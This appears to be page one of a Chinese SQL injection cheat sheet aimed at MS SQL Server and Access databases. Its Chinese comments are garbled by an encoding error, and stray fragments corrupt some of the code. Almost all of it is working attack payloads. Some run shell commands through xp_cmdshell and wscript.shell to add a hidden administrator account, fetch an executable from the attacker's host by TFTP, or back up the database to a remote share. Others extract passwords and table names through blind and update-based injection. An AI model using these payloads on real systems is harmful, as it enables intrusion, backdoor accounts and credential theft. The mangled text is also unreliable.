¡¡¡¡Æô¶¯_blank>·þÎñ

¡¡¡¡exec master..xp_blank>_servicecontrol start, server

¡¡¡¡;

¡¡¡¡DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC

¡¡¡¡SP_blank>_OAMETHOD @shell,run,null, C£º\WINNT\system32\cmd.exe /c net user

¡¡¡¡jiaoniang$Content$nbsp;1866574 /add

¡¡¡¡;DECLARE @shell INT EXEC SP_blank>_OACREATE

¡¡¡¡wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null,

¡¡¡¡C£º\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$Content$nbsp;/add

¡¡¡¡;

¡¡¡¡exec master..xp_blank>_cmdshell tftp -i youip get file.exe-- ÀûÓÃTFTPÉÏ´«Îļþ

¡¡¡¡;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\

¡¡¡¡;declare @a sysname set @a=xp+_blank>_cm¡¯+¡¯dshell exec @a dir c:\

¡¡¡¡;declare @a;set @a=db_blank>_name();backup database @a to

¡¡¡¡disk=ÄãµÄIPÄãµÄ¹²ÏíĿ¼bak.dat

¡¡¡¡Èç¹û±»ÏÞÖÆÔò¿ÉÒÔ¡£

¡¡¡¡select * from openrowset

¡¡¡¡(_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin

¡¡¡¡hax)

¡¡¡¡²éѯ¹¹Ô죺

¡¡¡¡SELECT * FROM news WHERE id=... AND topic=... AND .....

¡¡¡¡adminand 1=(select count(*) from [user] where username=victim and

¡¡¡¡right(left(userpass,01),1)=1) and userpass£ 

¡¡¡¡select 123;--

¡¡¡¡;use

¡¡¡¡master;--

¡¡¡¡:a or name like fff%;-- ÏÔʾÓÐÒ»¸ö½ÐffffµÄÓû§¹þ¡£

¡¡¡¡and 1(select

¡¡¡¡count (email) from [user]);--

¡¡¡¡;update [users] set email=(select top 1 name

¡¡¡¡from sysobjects where xtype=u and status>0) where name=ffff;--

¡¡¡¡;update

¡¡¡¡[users] set email=(select top 1 id from sysobjects where xtype=u and name=ad)

¡¡¡¡where name=ffff;--

¡¡¡¡;update [users] set email=(select top 1 name from

¡¡¡¡sysobjects where xtype=u and id>581577110) where name=ffff;--

¡¡¡¡;update

¡¡¡¡[users] set email=(select top 1 count(id) from password) where name=ffff;--

¡¡¡¡;update [users] set email=(select top 1 pwd from password where id=2) where

¡¡¡¡name=ffff;--

¡¡¡¡;update [users] set email=(select top 1 name from password

¡¡¡¡where id=2) where name=ffff;--

¡¡¡¡ÉÏÃæµÄÓï¾äÊǵõ½_blank>Êý¾Ý¿âÖеĵÚÒ»¸öÓû§±í,²¢°Ñ±íÃû·ÅÔÚffffÓû§µÄÓÊÏä×Ö¶ÎÖС£

¡¡¡¡Í¨¹ý²é¿´ffffµÄÓû§×ÊÁϿɵõÚÒ»¸öÓñí½Ðad

¡¡¡¡È»ºó¸ù¾Ý±íÃûadµÃµ½Õâ¸ö±íµÄID µÃµ½µÚ¶þ¸ö±íµÄÃû×Ö

¡¡¡¡insert into

¡¡¡¡users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

¡¡¡¡char(0x63)+char (0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

¡¡¡¡insert

¡¡¡¡into users values( 667,123,123,0xffff)--

¡¡¡¡insert into users values ( 123,

¡¡¡¡admin--, password, 0xffff)--

¡¡¡¡;and user>0

¡¡¡¡;and (select count(*) from

¡¡¡¡sysobjects)>0

¡¡¡¡;and (select count(*) from mysysobjects)>0

¡¡¡¡//Ϊaccess_blank>Êý¾Ý¿â

¡¡¡¡Ã¶¾Ù³öÊý¾Ý±íÃû

¡¡¡¡;update aaa set aaa=(select top 1

¡¡¡¡name from sysobjects where xtype=u and status>0);--

¡¡¡¡ÕâÊǽ«µÚÒ»¸ö±íÃû¸üе½aaaµÄ×ֶδ¦¡£

¡¡¡¡¶Á³öµÚÒ»¸ö±í£¬µÚ¶þ¸ö±í¿ÉÒÔÕâÑù¶Á³öÀ´(ÔÚÌõ¼þºó¼ÓÉÏ and name¸Õ²ÅµÃµ½µÄ±íÃû)¡£

¡¡¡¡;update aaa set

¡¡¡¡aaa=(select top 1 name from sysobjects where xtype=u and status>0 and

¡¡¡¡namevote);--

¡¡¡¡È»ºóid=1552 and exists(select * from aaa where aaa>5)

¡¡¡¡¶Á³öµÚ¶þ¸ö±í£¬Ò»¸ö¸öµÄ¶Á³ö£¬Ö±µ½Ã»ÓÐΪֹ¡£

¡¡¡¡¶Á×Ö¶ÎÊÇÕâÑù£º

¡¡¡¡;update aaa set aaa=(select top 1

¡¡¡¡col_blank>_name (object_blank>_id(±íÃû),1));--

¡¡¡¡È»ºóid=152 and

¡¡¡¡exists(select * from aaa where aaa>5)³ö´í£¬µÃµ½×Ö¶ÎÃû

ÉÏÒ»Ò³  [1] [2] [3] [4]